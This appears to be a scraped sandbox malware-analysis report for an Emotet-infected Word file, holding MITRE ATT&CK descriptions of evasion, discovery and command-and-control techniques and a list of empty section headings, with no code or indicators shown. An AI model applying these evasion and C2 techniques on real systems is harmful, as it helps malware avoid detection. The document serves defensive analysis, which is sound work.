Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DAT.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "DAT.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm1, Stream Size: -1

General

VBA Code Keywords

VBA Code

VBA File Name: UserForm2, Stream Size: -1

General

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre